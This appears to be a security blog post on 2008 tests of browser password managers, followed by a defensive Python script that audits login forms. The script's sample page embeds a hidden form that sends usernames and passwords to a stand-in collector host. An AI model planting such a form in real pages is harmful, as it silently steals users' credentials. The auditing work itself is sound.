Security Protection - Harry Waldron (CS)

Security Best Practices, Breaking News, & Updates

Chapin Information Services - Password Management Tested on 5 browsers

The detailed test results are interesting, and they point to improvements that all five major browsers should consider.

However, users should avoid storing passwords in the browser anyway for sensitive sites (especially e-commerce and banking). It is better practice to re-enter the ID and password each time, in case someone gains access to your PC. Re-entering the credentials also helps you remember the password.

On the site side, financial websites should be built so the browser does not capture the password field. Many sensitive sites are already constructed this way: the ID and password are entered as form fields across multiple screens, which keeps the browser from storing them.

Chapin Information Services - Browser Password Management Tests
http://www.info-svc.com/news/2008/12-12/
http://www.eweek.com/c/a/Security/Google-Chrome-and-Apple-Safari-Lead-Poor-Showing-by-Browsers-in-Password-Management-Test/

QUOTE: The company took a look at all the major browsers: Internet Explorer 7, Opera 9.62, Firefox 3.04, Safari 3.2 and Google Chrome. According to the study, each browser was susceptible to a number of vulnerabilities that could expose password information.

Of the five, Opera Software's Opera and Mozilla Firefox fared the best—meaning they passed seven of the 21 tests. Internet Explorer passed five tests, while Google Chrome and Apple Safari passed only two.

Three issues were cited by CIS as being problems that, when combined, could allow cyber-thieves to steal passwords without a user's knowledge. The first two are whether the browsers check the destination where passwords are sent and the locations where they are requested.

The third critical issue is whether the password manager delivers a password using a form that is not visible. If an attacker can put an invisible password form on the page and count on the password manager to fill in the form, it is possible to steal a user's password without the user ever knowing, Chapin explained.
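As an added example (not part of the original post or the CIS tests), the following Python script audits a page's HTML from the site owner's side for the three problems described above and for the mitigation mentioned earlier: a login form whose action posts the password to a host other than the page's own, password fields that are not marked `autocomplete="off"` (so the browser is invited to store them), and password fields or forms that are hidden from the user. It uses only the standard library; the page origin, the sample HTML and the hostnames are constructed for the demonstration. Note that `autocomplete="off"` is only a hint, and most current browsers ignore it for login fields, so it is a defence-in-depth measure rather than a control.

```python
from html.parser import HTMLParser
from urllib.parse import urlparse

# Inline styles that make an element invisible to the user.
HIDING_STYLES = ("display:none", "visibility:hidden", "opacity:0")


def _is_hidden(attrs):
    """True if the element's attributes hide it from the user."""
    if "hidden" in attrs:                      # bare HTML5 hidden attribute
        return True
    style = attrs.get("style", "").replace(" ", "").lower()
    return any(s in style for s in HIDING_STYLES)


class PasswordFormAuditor(HTMLParser):
    """Collects every <form> and the <input> elements it contains."""

    def __init__(self):
        super().__init__()
        self.forms = []        # each: {"attrs": {...}, "inputs": [{...}, ...]}
        self._current = None

    def handle_starttag(self, tag, attrs):
        a = {k.lower(): (v or "") for k, v in attrs}   # bare attrs -> ""
        if tag == "form":
            self._current = {"attrs": a, "inputs": []}
            self.forms.append(self._current)
        elif tag == "input" and self._current is not None:
            self._current["inputs"].append(a)

    def handle_endtag(self, tag):
        if tag == "form":
            self._current = None


def audit_password_forms(html, page_origin):
    """Return a list of findings for forms containing password fields.

    page_origin is the URL the page is served from (constructed input here);
    a form action naming a different host means the password leaves the site.
    """
    page_host = urlparse(page_origin).hostname
    parser = PasswordFormAuditor()
    parser.feed(html)
    findings = []
    for i, form in enumerate(parser.forms):
        pw_fields = [inp for inp in form["inputs"]
                     if inp.get("type", "").lower() == "password"]
        if not pw_fields:
            continue
        action_host = urlparse(form["attrs"].get("action", "")).hostname
        # Issue 1: where the password is sent (relative actions stay on-origin).
        if action_host and action_host != page_host:
            findings.append(f"form {i}: password posted off-origin to {action_host}")
        for inp in pw_fields:
            name = inp.get("name", "?")
            # Site-side mitigation: ask the browser not to store this field.
            if inp.get("autocomplete", "").lower() != "off":
                findings.append(f"form {i}: field '{name}' allows browser password storage")
            # Issue 3: a password field the user cannot see.
            if _is_hidden(inp) or _is_hidden(form["attrs"]):
                findings.append(f"form {i}: field '{name}' is invisible to the user")
    return findings


# Constructed sample page: a legitimate login form followed by an injected,
# hidden form that posts to another host (the pattern described in the post).
SAMPLE_PAGE = """
<html><body>
<form action="/login" method="post">
  <input type="text" name="user">
  <input type="password" name="pass" autocomplete="off">
</form>
<form action="https://collector.example.net/grab" method="post" style="display: none">
  <input type="text" name="user">
  <input type="password" name="pass">
</form>
</body></html>
"""

if __name__ == "__main__":
    for line in audit_password_forms(SAMPLE_PAGE, "https://bank.example.com/"):
        print(line)
```

Run against the sample page, the first form is clean and the second produces three findings: an off-origin destination, a storable password field and an invisible field. The same audit can be pointed at a site's own templates as a release check.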